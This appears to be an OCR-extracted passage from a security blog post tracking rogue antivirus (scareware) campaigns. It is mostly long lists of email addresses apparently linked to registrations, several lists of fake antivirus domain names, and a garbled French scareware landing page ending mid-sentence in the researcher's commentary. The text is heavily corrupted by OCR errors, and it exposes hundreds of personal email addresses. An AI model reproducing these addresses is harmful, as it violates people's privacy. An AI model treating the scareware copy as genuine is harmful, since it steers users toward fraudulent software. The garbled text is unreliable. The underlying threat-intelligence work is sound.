tiger19822000@gmail.com 
intelshoe@clubmoneys.com 
tcthesource@googlemail.com 
nunoamorim1989@hotmail.com 
speakuphosting@gmail.com 
kekerode@gmail.com 
trainboy@fuse.net 

milanv _cnp@yahoo.com 
cpaz2008@hotmail.com 
hailedg@gmail.com 
zarowix@gmail.com 

united snakes of america@hotmail.fr 
brunoxt@gmail.com 
pus@grisegutt.com 
sunitas@jsrsolutions.com 
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jorgen _berglund@hotmail.com 
throughghosts@gmail.com 
nistevo@live.com 
john.parker-702vcxlv@yopmail.com 
maricleadam@yahoo.com 
rossgo79@hotmail.com 
rahul.gupta@breaktherules.co.in 
sitefortest@hotmail.com 
andersonpxm@gmail.com 
tkriikk@gmail.com 
lizardo@live.it 
demonx42@hotmail.com 

brexei bananes@hotmail.com 
pollodani _l10@hotmail.com 
dr.linuxO@googlemail.com 
aminov31@hotmail.com 
kados35@gmail.com 
elbogenpavel@seznam.cz 

pujan _htf@hotmail.com 
praveen.g21@gmail.com 


hkzero _cool@hotmail.com 


ashley-lovescharlotteforeverxo@hotmail.com 


czone.evo@gmail.com 
eq2necro@gmail.com 
killerwOrm@hotmail.com 
spock@knology.net 
whos.nex@gmail.com 
p32@hotmail.es 

pondemonium _metal@hotmail.com 
ryanabzah@gmail.com 
p.miket@yahoo.com 
theoutlawz@gmail.com 
cristiantaborda08@hotmail.com 
fringo94@live.com 


acld@i4lolz.com 


14131 


kylecarabetta@gmail.com 
snoppskallen@gmail.com 
replytodawg@googlemail.com 
kabOkaa@gmail.com 
jppcasa@hotmail.com 
reivorgamonal@gmail.com 
melthor@gmail.com 
abu.almajd7@hotmail.com 
q3sunshine@gmail.com 

pure fm _wc@hotmail.com 
sandakanapple@hotmail.com 
vlrusmak3r@yahoo.com 
bbmbbmé6@hotmail.com 
xandlesh@gmail.com 
deichbauer@voyager.net 
aleksandar.nikolovL@gmail.com 
sin4.cOd3r@gmail.com 
vivek.securitywizard@gmail.com 
chiemela@gmail.com 
thug007@hotmail.co.uk 
andika.nescence@gmail.com 
eva _ma/965@yahoo.com.hk 
vjekoslav.jerkovic@st.htnet.hr 
aamadin@comcast.net 
darthdarko@hotmail.co.uk 
smahios@gmail.com 
djbori26@hotmail.com 
makancepat@gmail.com 
pjhartin@gmail.com 
jlperez623@gmail.com 
1234567890abc123@gmail.com 
klapps@gmail.com 
sylargame@gmail.com 
icedane@gmail.com 
keenshlack@gmail.com 
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antispionage.com 
antispionagepro.com 
antispypremium.com 
antispywarecontrol.com 
antispywaresuite.com 
antiver2008.com 
antivirusaskeladd.com 
antivirusfiable.com 
antivirusforall.com 
antivirusforalla.com 
antivirusfueralle.com 
antivirusgenial.com 


antivirusmagique.com 
antivirusordi.com 
antivirusparatodos.com 
antiviruspcpakke.com 
antiviruspcsuite.com 
antiviruspertutti.com 
antivirusscherm.com 
antiworm2008.com 
antiwurm2008.com 
archivoprotector.com 


1416 


allhailthedragonking@yahoo.com 
eagle.afridi@msn.com 
paul.8406@hotmail.co.uk 
zorkoo@voila.fr 
astropirit@gmail.com 
cherokee@hushmail.me 
bergen er _best@live.com 
nandamedia@gmail.com 
andr3zitO0@gmail.com 
pvm1xer@gmail.com 
giuros2@gmail.com 
joshr1993@msn.com 
amagacib@gmail.com 
poubel31@gmail.com 
travgens@gmail.com 
rubix@hackershub. info 


font.mike@gmail.com 


mike _grunewald2002@yahoo.com 


jeremiahbrooks1@suddenlink.net 
kimikemo@hotmail.com 
eng.m7mod@hotmail.com 
eddier@gibtelecom.net 
mikiil@email.cz 
txxtangO@yahoo.com 
sciroccol28@hotmail.it 
siborg666@live.co.uk 
djfishy@hotmail.com 
Imfaado@hotmail.com 
linosoft@hotmail.com 
copainyeah@hotmail.fr 

liil_ weezy@hotmail.fr 
alessiofaggionato@hotmail.it 
ntc4@free.fr 
badsaif@gmail.com 


ke3pup@sogetthis.com 


14133 


admin@spam.la 
nishanttiwaril988@gmail.com 
raithe 104@yahoo.com 
codnerd95@yahoo.co.uk 
swipl@hotmail.de 
rb63rscom@aol.com 
sySfailure.com@gmail.com 
joelohss@hotmail.com 
apmcoder@gmail.com 
rangersneapoliclub@gmail.com 
laurentjurkowitsch121@hotmail.com 
silolasd@hotmail.it 
68fmbsg7txw15jk@temporaryinbox.com 
hartundkernig@web.de 

jedi _dwarf@hotmail.co.uk 
r00tsec@mailinator.com 
l.maok@live.com 
matthew11224@hotmail.com 
alec.wiens@yahoo.com 
muhammad.baiquni@yahoo.com 
testbhl12@gmail.com 
ehsan.kalak@gmail.com 
thaivioc@guerillamail.org 

ren _kaiser93@web.de 
future@hush.com 

achraf10_ 3@hotmail.com 
labasr@gmail.com 
startg@gmail.com 
dl-admins@illuzone.com.ar 
ambercolour@gmail.com 
warezsmash@googlemail.com 
vutangvn@gmail.com 
dominant _krabz@hotmail.com 
thor-x@libero. it 
rachel.lanzi@yahoo.com 
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fernando sabala@hotmail.com 


uxO0qtua@gmail.com 


pedrobkmupitchar@hotmail.com 


keegan.sh@gmail.com 
scryrain@gmail.com 
bcompledo@gmail.com 
startube@live.no 
infOrx@hotmail.com 

gi kappa@hotmail.com 
ycpc55@yahoo.ca 
larnelle@gmail.com 
catll@gmx.at 
syntaxphaze@hotmail.com 
wii347@yahoo.com 
printscreen12345@126.com 
Ss _onuria@hotmail.com 
ramsesenisa@hotmail.com 
mitticro@net.hr 
schniggs420@gmail.com 
oliver@pc-ziegert.de 
satyrlus@hushmail.com 
orcistra@hotmail.com 
hirol220@yopmail.com 
m18 _casper@yahoo.com 
symbcabir@hotmail.com 
sadhacker@hotmail.com 
dungvt2009@gmail.com 
ziddu.imhc@yahoo.com 
eochai@hotmail.com 
bigmark60@gmail.com 
xray27@seznam.cz 

kaizer 88@hotmail.com 
geffchang@gmail.com 
rockstawebs@hotmail.com 


gunz _the.duel@hotmail.com 
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hg _olimpiada@hotmail.com 
dirtyhack@hotmail.com 
minty1986@hotmail.co.uk 
skyxv@live.com 
wwwpfy@yahoo.com.cn 
f4ceurfe4r@gmail.com 
happistekiller@gmail.com 
dr.technical@msn.com 

prog ahmedmonir@yahoo.com 
kampfvogel@gmx.net 
amikhmel@gmail.com 
veohtv _babar@hotmail.fr 
alent _728@163.com 
b4tt054y@yahoo.com 
by.s3curlty@hotmail.com 
asabdooo@yahoo.com 
masterkale@hotmail.com 
ploder424@googlemail.com 
eyadema _01@yahoo.com 
favor23@ymail.com 
larou94@hotmail.com 
talkora@hotmail.com 
gabrieloukawa@gmail.com 
duongdoi@ymail.com 
jarekcool@gmail.com 

smart _ryth@yahoo.com 
warezlogs@gmail.com 
exploiterr@rambler.ru 
revoltff@rambler.ru 
murilloarantes@yahoo.com.br 
gch5185@hotmail.com 
d929386@bsnow.net 
kdz_psycho@web.de 

j -hickam@hotmail.com 
jchachojr@yahoo.com 
14136 


genetix.ssh@gmail.com 
guilherme _vitoratto@hotmail.com 
julianesu@hotmail.com 
bellasinalma35@yahoo.es 
alan.reynaldi@yahoo.co.id 
mattturner@usa.com 
m8r-6nus351@mailinator.com 
roflcakes@mailinator.com 
genotjonathan@hotmail.com 
jshanch@gmail.com 
mr.vimal.singh@gmail.com 
nariman619@gmail.com 
jOrd4nn@googlemail.com 
ashnar198@hotmail.com 
darth _attila@hotmail.com 
empire 452@hotmail.com 
xplzn@live.com 

yo gai _boys@hotmail.com 
magic _7x@yahoo.com 
mafia.x264@gmail.com 
bruno.teroo@gmail.com 
goodava@gmail.com 
chuncho132@hotmail.com 
ryan@ctnetworks.net 
josiph84@live.com 
zaxscdvfewqrt@hotmail.com 
zafirl12@gmail.com 
pana.sonia@hotmail.com 
zbr _pirate@hotmail.fr 
igbtbt@gmail.com 
dejajahnee@yahoo.com 

rh _andi@yahoo.co.id 
earth12893@comcast.net 
n9g4@yahoo.com 
brm9148@yahoo.com 
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zexus.zexus@gmail.com 
imike24@yahoo.com 
titansdante@yahoo.com 
npavlic@siol.net 
x.jung@volny.cz 

frgy _frgy@yahoo.com 
chrisbaio@live.com 
mahabad72@gmail.com 
wikisam@gmail.com 
manfred1187@web.de 

good _arron@hotmail.co.uk 
dbertucci6@gmail.com 
mobile4sale2000@yahoo.com 
vasile4bile@gmail.com 
niggaonthamovev2@live.com 
iliaskonstantopoulos@hotmail.com 
computer-t-t@programmer.in.th 
nm.hackmaster@gmail.com 
blackhat420@gmail.com 
acidx619@gmail.com 
wendor@gmail.com 
mike495@live.com 

cs binladen@yahoo.es 
adamfarsight@gmail.com 
velezestes@rocketmail.com 
nicfoot66@live.ca 
pedro.numero@gmail.com 
t-gratton@hotmail.com 
slickcrissi@gmail.com 
d1i2eminem989@gmail.com 
phreak@deathteam.net 
elodie21000@hotmail.com 
guil3z03@gmail.com 
bornkillall15@yahoo.com 
arifsanchez@gmail.com 
14138 


tribalsoy@bsdmail.com 
ratez07@gmail.com 
skriblezO7@hotmail.com 
sutanlee@yahoo.com 
zuzulinus@gmail.com 
bartass13@interia.eu 
davidsmark78@gmail.com 
bati90179@yahoo.com 
neo019@gmail.com 
zeroxenator@hotmail.com 
tot6tO@hotmail.com 
nodisturb@gmail.com 
realmadrid.king@gmail.com 
sana@mt2009.com 
5zig3n@gmail.com 
king.of.tmeel7@hotmail.com 
manku87@gmail.com 
thecrazyplayerl1@hotmail.com 
warezmall007@gmail.com 
digital.death@hotmail.com 
mrbin007@hotmail.it 
christian.1992.14@hotmail.com 
5p00f3r19@gmail.com 
murda@hush.com 
raj.puhto@gmail.com 
im-kash@live.com 

| _wki@hotmail.com 
adamo-123@hotmail.com 
amn3siac.h4x0r@gmail.com 
s.mario99@web.de 
pO0jan@pOO0jan.com 
jakedavis@live.com 
muralil309@gmail.com 
5431325@163.com 


someone.somewhere.out@gmail.com 
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liverpoolfc.net@gmail.com 
r_r00t@yahoo.com 
ghettoshakur@yahoo.com 
Ishadowx1@hotmail.com 
dperez916@gmail.com 
enqueue.max999@gmail.com 
user12399@hotmail.com 
rsoxsrock1992@aol.com 
violet.lantern@gmail.com 
xf34rx@gmail.com 
mofosbeast@yahoo.com 
tgatta0l1@yahoo.com 
dj-alechco@gmx.net 
pgs.kiste@gmail.com 
jamiejos@g3tsome.com 
knight _rehan@hotmail.com 
jakob.ivanovski@gmail.com 
dj _anuraag@hotmail.com 
drew1982@gmail.com 
chaiderdvi@yahoo.com.br 
barsukui@inbox.|It 
sbarrios93@gmail.com 
viethak84@gmail.com 
clrcuit@hotmail.com 
sanfoor007@hotmail.com 
dropit.it@gmail.com 
tanks6312@hotmail.com 
joaomitch@hotmail.com 
leonspyke@live.nl 

cody katska@hotmail.com 
chuiyen40@yahoo.com 
879596771@qq.com 
xzibit.sna@hotmail.com 
xxhackerxx@live.fr 
sparrow318@gmail.com 
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squash92@gmail.com 
ericsson@chef.net 
crivadron@hotmail.com 
lovexfaux@hotmail.com 
rifziyad@hotmail.com 
madagent2005@yahoo.com 
nightfire 95@mail.ru 
binaryO11011@gmail.com 
matt _esn@hotmail.com 
phil357@live.fr 
scaryblackguy@live.com 
mmetalguyx@hotmail.com 
hadjdu94@hotmail.fr 
satan.divine@yahoo.in 
I3lackrooz@gmail.com 
cezarv4@live.com 
niggaonthamoon@live.com 
niggaonthamoonv2@live.com 
thedoctor team@hotmail.fr 
exstermin01@hotmail.com 
darkz _rath@yahoo.com 
shishir85raghuvanshi@gmail.com 
d2575803@bsnow.net 
hawkmyester@yahoo.com 
d.new _guy@yahoo.com 
yosnowboardyo@hotmail.com 
ivuln@hotmail.com 

iceed tea@hotmail.com 
deandre81@gmail.com 
polifemo@datafull.com 
malbrog@gmail.com 
shades89@gmail.com 
them.root@gmail.com 
betalanet@gmail.com 


dr_timoon@hotmail.com 
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lupsu2@suomi24.fi 
bryan.woodler@gmail.com 
jfex@live.com 
blackportt@gmail.com 
opieonz@gmail.com 
mb8068@hotmail.com 
wazzp@cyber-rights.net 
pussymoep@web.de 
esel46x@yahoo.de 

der _imperator darth _sidius@hotmail.de 
prefessordent@gmail.com 
mustainer@gmail.com 

first. myemail.last@gmail.com 
jeremyrcort@gmail.com 
kickerbat@hotmail.co.uk 
anvesh _reddy247@yahoo.com 
christopherharrisonlO@yahoo.com.au 
hardcoreimpact@ymail.com 
thecreatorr@googlemail.com 
mrtwig24@gmail.com 

elite.ym _jarol@yahoo.com 
meruty@free.fr 

gabriel canon79@hotmail.com 
jmunz2@izoom.net 
kanoticx@hotmail.com 
spikecursed@gmail.com 
funkeba@gmail.com 
ajes1984@gmail.com 
akon-85@hotmail.com 
ayehts@gmail.com 
msndetrapi@hotmail.com 
d3055265@bsnow.net 
shaker-beker@inbox.ru 
beamx24@hotmail.com 
master msp1@hotmail.com 
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avsystemcare.com 
avsystemshield.com 
barrevirus.com 
bastioneantivirus.com 
bestsellerantivirus.com 
bortmedvirus.com 
cerovirus.com 
debellaworm2008.com 
defensaantimalware.com 
defensaantivirus.com 
drivedefender.com 
exterminadordevirus.com 
fiksdinpc.com 
mijnantivirus.com 
mobileantiviruspro.com 
norwayvirus.com 
nowayvirus.com 
pcantivirenloesung.com 
plutoantivirus.com 
viruscontrolleuer.com 
zebraantivirus.com 
zeusantivirus.com 


Portfolio three : 


pcsecuresystem.com 
antiworm2008.com 
winsecureav.com 
menacerescue.com 
pcvirusless.com 
lifelongpc.com 
nochanceforvirus.com 
menacemonitor.com 
trojansfilter.com 
longlifepc.com 
knowhowprotection.com 
bestsellerantivirus.com 
pcvirussweeper.com 
antiespiadorado.com 
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fsjuta@gmail.com 
beatlefan156@yahoo.com 
maximum.plumbing@gmail.com 
jimpower29@hotmail.com 
doc451@rocketmail.com 
dite@xmystified.org 
rafael.rafakinkas@gmail.com 
gagan _1818@yahoo.com 
luke.tran98@yahoo.com 
datboy143@hotmail.com 
awowy@yahoo.com 

flying ufo 001@yahoo.com 
hkrzs4u@gmail.com 
ccarriveau@gmail.com 
ssyaol@hotmail.com 
djnefisl1@web.de 
billy.sq.da@gmail.com 
richardlahl@web.de 
cool.pro@gmail.com 
gbx@live.de 
lalal589@walla.co.il 
depere2012@live.com 
ruffa@live.nl 
rokemddd@gmail.com 
joaogravel5@hotmail.com 
jesse.lamb@live.com 
leonardofranciscol8@hotmail.com 
eddy@3721.net 
codeagle01@gmail.com 

raj 534y@yahoo.co.in 
whatsthefouroneone@yahoo.com 
jkmusic @live.com 
jagadeeshskO07@gmail.com 
mike _pinkney@hotmail.co.uk 


worldoflol2@live.com 
14143 


letsdothis@live.com 
mattygigio@libero. it 
matteo.giraldo@gmail.com 
panix187@gmail.com 
saligia.seven@gmail.com 
anasstriker@hotmail.com 
kOsm085@02.pl 
aliasgl@gmail.com 
irek@netend.pl 
dudeweresmycar300435@hotmail.com 
rogier@emke.nl 
kurdm88@yahoo.com 
ok@live.com 
chris2603@yahoo.com 
rakatiarna@gmail.com 
chazamrigh@yahoo.com 
angeldust _usa@hotmail.com 
neon989@tlen.pl 
az009@mailinator.com 
matan12128@hotmail.com 
rex.scot@gmail.com 

niki 80@hotmail.de 
chilenitol _1@hotmail.com 
kat kat thoms@hotmail.com 
aashishkumarranjan@gmail.com 
az0@guerrillamailblock.com 
kyle _xp@hotmail.com 
anorisalatielu@yahoo.com 
shankuo@gmail.com 

lovely bee81@yahoo.com 
tharrowl@yahoo.com 
andy.sorted@gmail.com 
daniel.schnepf@yahoo.de 
pira7ed@gmail.com 
mrbubbly4@hotmail.com 
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mavrick8888@gmail.com 
galin.b.vasilev@gmail.com 
linggau2887@gmail.com 
ameed _shahzad@hotmail.com 
hellls@hotmail.com 
escObar@bk.ru 
ayoub26@hotmail.it 
fracico91@yahoo.it 

crasher _1412@yahoo.com 
krbestl123@yahoo.com 
mesa6256@yahoo.com 
hawk01@Qlive.co.uk 
abaidk@live.co.uk 
ifr33th@gmail.com 
crush3r@1337-crew.to 
nightmasterL01@gmail.com 
kataeb@live.fr 
d3561565@bsnow.net 
selpix@yahoo.com 
homonnai.gergely@freemail.hu 
wishi@thisisnotmyrealemail.com 
int.1422@hotmail.com 
joseph.anderson81@yahoo.com 
jes@accademia3.it 

miguel angelo 999@hotmail.com 
gyepeskukac@citromail.hu 
u930421@oz.nthu.edu.tw 
gabriel syrus 4515@hotmail.com 
beavermeat94@gmail.com 
lebanese boyy@hotmail.com 
bluemoonn 4@yahoo.com 
jgnfrxudfmgker@mailinator.com 
mm9111|@hotmail.com 
goldmagnums@gmail.com 


_sulo _@live.nl 
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qwertzzz@thisisnotmyrealemail.com 
pc8aditheone@yahoo.com 
hani _517@yahoo.com 
nikushakipiani@yahoo.com 
burning _flame01@hotmail.com 
hetlandvan@hetlandvan.nl 
hazzarduk1@hotmail.com 
e€197541@bsnow.net 

aliyildiz my _20@hotmail.com 
aeneas.d@hotmail.com 
ungasO4@yahoo.com 
illucid.ryan@gmail.com 

ex _saz@hotmail.com 
asianbrg@aol.com 
peterbacsi@freemail.hu 
corbitext@gmail.com 

anurag _foreverforyou@yahoo.com 
diedoarab@gmail.com 

immi _patel@yahoo.com 
dondaherian@hotmail.com 

b thunder@ymail.com 
sv3w@hotmail.com 
cairohx@hotmail.com 
blazerx@gmail.com 

g _unit50ldier@yahoo.com 
htlehoang@gmail.com 
degames@msn.com 

ed- -99@hotmail.com 
admiral.riker@gmail.com 
wajika@gmail.com 

han _chiang@hotmail.com 
pumping _iron83@hotmail.com 
deeprock@w.cn 
sozosuru@gmail.fr 


dreameroffreedom@hotmail.com 
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djsikwitit@yahoo.com 
reiganl13@freemail.hu 
finr@aster.pl 
sg217@windowslive.com 
a_van33@hotmail.com 
nod32enabler@gmail.com 
nOt cO0lI@yahoo.com 
keepsecuresite@gmail.com 
v_99_x@hotmail.fr 
nejwh@hotmail.com 
shanikk@gmail.com 
support@cyngiel.net 
aminenet.dz@live.fr 
damnedlife@live.cl 

bahy _sampad@yahoo.com 
amizi@hotmail.fr 


artursuppesic123@web.de 


hunterdead _1994@hotmail.com 


ginger@writingpad.org 
yonetimweb@hotmail.com 
kylerams@yahoo.com 
fznfew@rocketmail.com 
mrpervie@gmail.com 
naven.ps@gmail.com 
igorinho _1994@hotmail.com 
o.bell@hotmail.it 
vickyz@phuseangthong.com 
crow@yopmail.com 
blackdragon1400@gmail.com 
reix.8Bb@gmail.com 
marrock@live.it 
an.smithersO09@gmail.com 
daniel.cassia@hotmail.it 
double-ddos@yandex.ru 


vaygle@msn.com 
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tacops40@gmail.com 
eitarbi@gmail.com 
oxgodxo7@gmail.com 
thehitman101@hotmail.com 
adm.nahash@e-existen.net 
mastriawan@gmail.com 
fxwtxwd@163.com 
drakeistheman@hotmail.com 
velodakilla@hotmail.com 
spiedy9@hotmail.com 
juanse254@hotmail.com 
klsoft@yahoo.com 
g-h-o-s-t-h-a@hotmail.com 
op2rules@gmail.com 

rafo cro@hotmail.com 
maxou _502@hotmail.fr 
sweety Lnine@yahoo.com 
yahspy@yahoo.com 
pacmanzombiel@springsairairlines.com 
xsyafiqx@live.com 
lajaniO8@yahoo.com 
dj-gali@wanadoo.fr 
whoerr@gmail.com 
blinken@hush.com 
sirh4xOr@hotmail.com 

nicky _1691@hotmail.com 
internetterroristz@gmail.com 
nvm-yordo@hotmail.com 
izouner@hotmail.fr 

bizzy _gambinill@yahoo.com.ph 
bizzygambinill@gmail.com 
turbotrix12@hotmail.com 
steve.austin.cod2@hotmail.com 
rdogg999@hotmail.com 
ankush.chadda@gmail.com 
14148 


de4d.cOde@gmail.com 
cakeukr@gmail.com 
becks2307@live.com 
black.hat@live.com 
stephanx6@web.de 
sakotasr@comcast.net 
rodrigo 001 9@hotmail.com 
secode@qq.com 
kabradomonte@hotmail.com 
6lucifer9@gmail.com 
genesis.93@hotmail.fr 
tronwind@gmx.com 
z2z2@hotmail.it 

brock harper77@hotmail.com 
yogesh _jaygadkar@rediffmail.com 
fatnassty123@yahoo.com 
r6.raven@hotmail.com 

user 87@cluemail.com 
kylecarabetta@att.net 
squeezerxx@gmail.com 
prometeo77@yahoo.it 
eli_dor shni@walla.co.il 
helmekad@hot.ee 
al.kariminal@yahoo.fr 
s-war@hotmail.com 
instant@live.com 
lvcrxrcr@yahoo.com 
jamway@worldnet.co.nz 
d33pbl4ck@googlemail.com 
master ady12@hotmail.com 
niho@live.ba 
princeyababa@live.com 
36358@qq.com 
rikilanal@gmail.com 
bun128@hotmail.com 
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ikbennietbang@hotmail.com 
tomas.kotrba@gmail.com 
shounjohn@gmail.com 
edoni@live.com 
petteflat@live.nl 
emergency-door@hotmail.co.uk 
nvn.karuthedath@gmail.com 
d4t4x@live.com 
valenzuela.guillermo2@hotmail.com 
yayitsflanman@yahoo.com 
fabinholoco@terra.com.br 
g835198@bsnow.net 
t2g846@hotmail.com 
wahooli@hotmail.com 
incubo.tuo@live. it 
sokafanycolyjoga@tempomaail.fr 
era@intermail.ir 

lethps2_ 2@msn.com 
goldenslimems@gmail.com 
addyg420@yahoo.com 
stephane.|hermitte@telindus.lu 
warrockpro@hot.ee 
eliteetiennel3@hotmail.com 
dixiesgeneral@aol.com 
zargonovski@gmail.com 
fx0@root.org 
jingeslabra@yahoo.com 
thk-h3x@hotmail.com 

gui Oo@hotmail.com 
delete.616mi@gmail.com 
madd0x _@hotmail.com 
linuz9l1@gmail.com 
ilovemythicmaps@live.com 
kraft78@gmail.com 
zimperz@fritids.org 

14150 


aneeshprasad36@gmail.com 
sosyete-m-@hotmail.com 
124112@mailinator.com 
ansuampanat@yahoo.co.in 
theschedin@live.com 
pedroiwuoha@yahoo.com 
halilsafakkilic@hotmail.com 
samplesev@gmail.com 
toxicvirging9l1@yahoo.de 
death-soul@live.no 
sentabi@sentabi.com 
wesleysteinbrecher@hotmail.com 
Z0122191@yahoo.com.ph 
b73553@tyldd.com 
itama95@gmail.com 
leegarner@dive-shield.com 
jacOblynge@hotmail.com 
mightyfied _wolf@hotmail.com 
rapha _soldier@hotmail.com 
dragonkillerdu69@hotmail.fr 
rafa_massO O@hotmail.com 
jesselee.sanchez@yahoo.com 
traxkah@freemail.hu 
b.feco93@freemail.hu 

skyline _ta@hotmail.it 
syko2500@onet.eu 
sairamvg@gmail.com 

a _jack7@yahoo.co.uk 
massacre378@hotmail.com 
mx _darksage@yahoo.com.my 
limon 01 O2@hotmail.com 
solterol9rufy19@hotmail.com 
you _are_a_suker@hotmail.com 
pilyong.torpe@yahoo.com 


basti.planet@yahoo.com 


14151 


crush.kit4¢@yahoo.com 
fryshadow@gmail.com 
masoom@roger.com 
silentuserl1@yahoo.com 
beelzebub68@googlemail.com 
eee@drek.si 
2rambo@windowslive.com 
phelipe lokinhu@hotmail.com 
jzmanconnect@gmail.com 
wuxiangyuan@gmail.com 
keytoopen07@gmail.com 
k7hck@yahoo.gr 
noisebleed@gmail.com 
keesknarren@live.nl 
hiddenillusion@gmail.com 
doctorx _1969@hotmail.com 
graham.mackie@gmail.com 
usa@id.ru 

huyenthoai _eragon@yahoo.com 
ghostinsan@gmail.com 
warning _crysis@live.co.uk 
robinoo8@hotmail.com 
hrenor@gmail.com 
peperos91@hotmail.fr 
mago666@gmail.com 
furioso.mu@gmail.com 
morat26@gmail.com 
h04vo@hotmail.com 
m.h.steenman@gmail.com 
audiowarez666@gmail.com 
eileengallo@gmx.com 
mwpmember@gmail.com 
tomi _002@hotmail.com 
frenk.alternativo@live.it 
josechu@fibertel.com.ar 
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Pp 0 0 


trusted 


e.com 


avsecurityplus.com 
apolloantivirus.com 
pcassertor.com 
menacesecure.com 
poseidonantivirus.com 
trustedantivirus.net 
pcboosterpro.com 
defensivesystem.com 
goldenantispy.com 
avsystemcare.com 
trustedantivirus.com 
antimalwareshield.com 
avsystemcare.com 
antiviruspcsuite.com 
antivirusforall.com 
trustedprotection.com 
nowayvirus.com 
pcantiviruspro.com 
antispywareconductor.com 
antispywaremaster.com 
turnkeyantivirus.com 
yoursystemguard.com 


1418 


illegalkneival@hotmail.co.uk 
iznorl0@walla.com 
1Inv1s1bl3cOntr0l|@gmail.com 
adrianl 10@02.pl 
cabster21@gmail.com 


jerem2727@hotmail.com 


zendani _az_yad _rafte@yahoo.com 


golfzp@gmail.com 

love pc@hotmail.com 
renagadewolf@gmail.com 
pfcrogue@yahoo.com 
bojasoom1@hotmail.com 
chanli2l1@gmail.com 
darksauc3@googlemail.com 
yordan.b@hotmail.com 
homerjay1979@gmail.com 
djbdo@hotmail.com 
iisdenub@gmail.com 
tii.boby45@live.fr 


cezarv5@live.com 


theOdeadOmanOhacker@gmail.com 


plycasino@yahoo.com 
hardcorehoppus@gmail.com 
king dmp@msn.com 
m3cc4@wh4f.org 

amy _kruze@yahoo.com 

it. man@hotmail.co.uk 
lightgod@phoenixchat.hu 
cheOpo@yahoo.fr 

leonar xn@hotmail.com 
simon _victor2786@hotmail.com 
jesseleesanchez@hotmail.com 
pathfinder662@gmail.com 
marc9401@gmail.com 


return.404@gmail.com 


14153 


lolwut@trash2009.com 
v3lix@live.com 
abse92@hotmail.it 
stephenoktara@yahoo.com 

m _b2007@hotmail.com 

dab jogja@yahoo.com 
pockets1996@yahoo.com 

lil fob of da _century@msn.com 
codyfromhell@hotmail.com 
kaOs@live.co.uk 
killavirus@gmail.com 
goliafl7@mail.ru 
bobderbumser@hotmail.de 
hb20@quizzworld.com 
theaudiman2007@gmail.com 
mammaaaad@yahoo.com 
scripters.mobi@gmail.com 
alecarmbruster@gmail.com 

kikz for laughter@hotmail.com 
djstimulate@sbcglobal.net 
willscarsl1@yahoo.com 
alca_14@hotmail.com 
macro215@gmail.com 
jod650@web.de 
kanserdarl6@gmail.com 
kkt678@gmail.com 
rexvdmb@hotmail.com 
litcsys@gmail.com 
madanprasadmk@yahoo.co.in 
sagarsiddhapura@gmail.com 
cobra _claudiu2006@yahoo.com 
fOr.th3.w1n@spambog.com 
johndeerecountrytboy1@yahoo.com 
countrytboy8067@yahoo.com 
cd _73@hotmail.fr 

14154 


eegabooga@aol.com 
csrbija2007@gmail.com 
gigel _prorapid@yahoo.com 
elprOOs@hotmail.com 
dstar101@gmail.com 
bluesrhythm@hotmail.com 
grimrobb@gmx.com 
psykick.ruhyn@gmail.com 
j junior99@hotmail.com 
hrnndz __brd@yahoo.com 
prasadreddy.g@psrcmr.com 
sOc@hotmail.fr 

klashi 47@hotmail.fr 
helpx@msn.com 
thijs.yannick@hotmail.com 
vitorpisarro2@hotmail.com 
dr. vojta@seznam.cz 
webworksy@yahoo.com 
frederikklein@gmx.net 
hohaki-san@gmx.de 
zimix2004@yahoo.com 


sakaldarijan@yahoo.com 


raw wwe _cena@hotmail.com 


cruzenaldo@gmail.com 
bluahsen@hotmail.com 
owasp@internOt.net 
radioactlv3@yahoo.com 
frikitown@hotmail.com 
getawaybg@gmail.com 
advscan@hotmail.com 
nova-pro@yandex.ru 
da-small-b@hotmail.co.uk 
blockwest@live.at 
adj421s@abv.bg 


sswirdo@hotmail.com 


14155 


mekp21@gmail.com 
acidwolf@hotmail.fr 

o4isloved @yahoo.com 
kamel-02@live.com 
throne@hotmail.co.uk 
chuky2009@hotmail.com 
lvetotchya@yahoo.com 
thirteen _lackner@hotmail.com 
klaktubaradaniktu@gmail.com 
indO@indounderground.net 
dmitza89@yahoo.com 
hrenojed@gmail.com 
saijimlaker@yahoo.com 
gr33nc0d3@gmail.com 
007.at@one. It 
chessmaster1980@hush.com 
blabla54@hotmail.de 
jaredburlison@comcast.net 
mouthmouth _44@hotmail.com 
amquen@gmail.com 
carder1912@yahoo.fr 
bsixs@hotmail.com 
wufei529@yeah.net 
febriantoperdanaputra@yahoo.com 
mr.lemon8x@gmail.com 
tritreetrip@gmail.com 
tobbe.per@hotmail.com 
darksage7@gmail.com 
5copsknow@gmail.com 
lolwtf@hhotmail.com 
shostl12@gmail.com 
asderopterx@googlemail.com 
mailocupe@gmail.com 

gareth _willia64@hotmail.com 
silverlode@gmx.net 
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juppe juuso@hotmail.com 
didik wokeh@yahoo.co.id 
cOmpil3@msn.com 
saudi-lOrd@hotmail.com 
yoshi _mot@hotmail.fr 
-x9x-@w.cn 
andersoncolin63@yahoo.com 
w.heuss2@web.de 
panuwat159@hotmail.com 
c0d38r34k3r@gmail.com 
bow _lks@hotmail.com 
theohacker@hotmail.com 
dineshmuktha@gmail.com 
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Votremeilleuranti 
Virus 


Le mveiilews entivivus 


Accueil PROTEGEZ VOTRE 
SYSTEME DES VIRUS 
MAINTENANT! 


Assistance 


Achetez 
maaantenant 


Fonctions principales 


* Fournd la protection efficace conte tous bes virus, vere et 
Foyens connus 

* Préviert votre PC Ge la phndtraton des esplons et 
pudexiels et protege completement votre contidentaite 

* Detrut les pOp-ups eneuyartes avart quietes s@ chargert 
Gans vere PC 

* Anaiyse réqubrement vole PC en virus ot auttes bgciets 
matvertants 

* Met & jour les bases de donnbes virales 

* Garant faesisternce aux cherts professionnetie gratute 


Votre probleme 


VotreietieuArOveus a dt Cr6é pout Cour qui UBisert largement leurs Oronateurs 


Notre solution 

VotreltesieuAréovirus vous permet de conirdter complbternert votre PC. Si volre ordinateur ett un cul précteux de votre travail cu de 
tottir, vous apprécierer ce programme, patte qu't gacde vote systhmne des virus et autres programmes matvediants 4 aise des 
analyses régubdres, aussi, # vOUs prothpe des violstons de votre conSdentalte et vous fournd une profecton complete et eficace 
60 vette ordinateur 


Qui a besoin de VolreMeieurAntivirus? 
Votelee@euArovrus est pour ceux qui vevient protéger leurs ordinateurs. Si votre PC est touvent aftaqué de virus et de vers et 
Queigun esse OF Sure vos aCtVineS Sut Intemet, Biers, Ce logiciel est pou vous. Travadiez en sécurté ot UBtseZ Internet Sars 
BucUNe NQUMHIOe Avec VoreltemeuArovrus vous #195 protege cortre toutes les menaces existortes! 


Just like a previous [10]proactive incident response where | pointed out that these fake security 
applications are starting to appear as the final output in malicious campaigns injected 

